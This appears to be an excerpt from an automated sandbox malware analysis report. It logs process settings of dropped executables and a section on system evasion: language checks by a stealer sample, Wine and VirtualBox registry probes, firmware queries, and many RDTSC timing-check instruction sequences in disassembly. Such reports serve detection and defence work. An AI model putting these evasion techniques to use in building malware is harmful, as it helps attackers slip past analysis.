Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 1245AD4
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 12B9E0E
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 11F5364
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 114A544
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 1169810
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 131F1DA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 1165B58
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe API/Special instruction interceptor: Address: 15DCF4A
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6F44F second address: A6F455 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2528 second address: BE2536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2536 second address: BE2559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2835h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2559 second address: BE2571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F927881D80Dh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE285B second address: BE2887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE2834h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE2887 second address: BE288B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE288B second address: BE289A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE289A second address: BE28A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE5484 second address: BE54A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F9278BE2826h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE54A1 second address: BE54A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE54A7 second address: BE54AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE54AB second address: BE54F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jbe 00007F927881D808h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007F927881D810h 0x00000022 jmp 00007F927881D815h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE54F8 second address: BE54FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE54FC second address: BE5514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE559E second address: BE560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9278BE2828h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D190Ah], edx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D1C03h] 0x00000030 call 00007F9278BE2829h 0x00000035 push ecx 0x00000036 jmp 00007F9278BE282Fh 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007F9278BE2834h 0x00000044 push esi 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE560C second address: BE5610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE5610 second address: BE562C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE562C second address: BE5640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE5640 second address: BE5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE5644 second address: BE564A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE564A second address: BE5701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F9278BE2830h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F9278BE2828h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push ecx 0x0000002e push edi 0x0000002f sub dword ptr [ebp+122D2401h], edi 0x00000035 pop edi 0x00000036 pop edx 0x00000037 sub dword ptr [ebp+122D1C09h], ebx 0x0000003d push 00000003h 0x0000003f mov dword ptr [ebp+122D1843h], eax 0x00000045 push 00000000h 0x00000047 jmp 00007F9278BE2836h 0x0000004c push 00000003h 0x0000004e call 00007F9278BE2835h 0x00000053 jmp 00007F9278BE2836h 0x00000058 pop edi 0x00000059 push A7C0AC2Ah 0x0000005e push ebx 0x0000005f jnp 00007F9278BE282Ch 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE584E second address: BE586B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D818h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE586B second address: BE589B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F9278BE283Dh 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE589B second address: BE58B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F927881D80Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE58B5 second address: BE58BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04EAA second address: C04EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007F927881D806h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C04EBA second address: C04EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05281 second address: C05289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05289 second address: C0528E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0528E second address: C052E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F927881D817h 0x0000000c js 00007F927881D806h 0x00000012 popad 0x00000013 jmp 00007F927881D811h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push ecx 0x0000001c jo 00007F927881D806h 0x00000022 pop ecx 0x00000023 pushad 0x00000024 jmp 00007F927881D80Dh 0x00000029 jp 00007F927881D806h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05437 second address: C05451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05451 second address: C05457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05891 second address: C058CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F9278BE2828h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9278BE2833h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9278BE2839h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C058CD second address: C058DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D80Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05A75 second address: C05A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05A7B second address: C05A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05A7F second address: C05A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F9278BE2826h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05BEA second address: C05BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05BF0 second address: C05BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05D3F second address: C05D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05D43 second address: C05D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05D47 second address: C05D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05D51 second address: C05D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05D64 second address: C05D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05E9E second address: C05EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F9278BE283Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05EAD second address: C05EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D813h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C05EC4 second address: C05EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2836h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C068D5 second address: C068DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C068DB second address: C068E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C068E3 second address: C068FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D811h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06EC7 second address: C06ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06ECD second address: C06ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06ED1 second address: C06EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007F9278BE2826h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C06EFE second address: C06F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C09186 second address: C091AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2839h 0x00000009 pop ecx 0x0000000a jnl 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
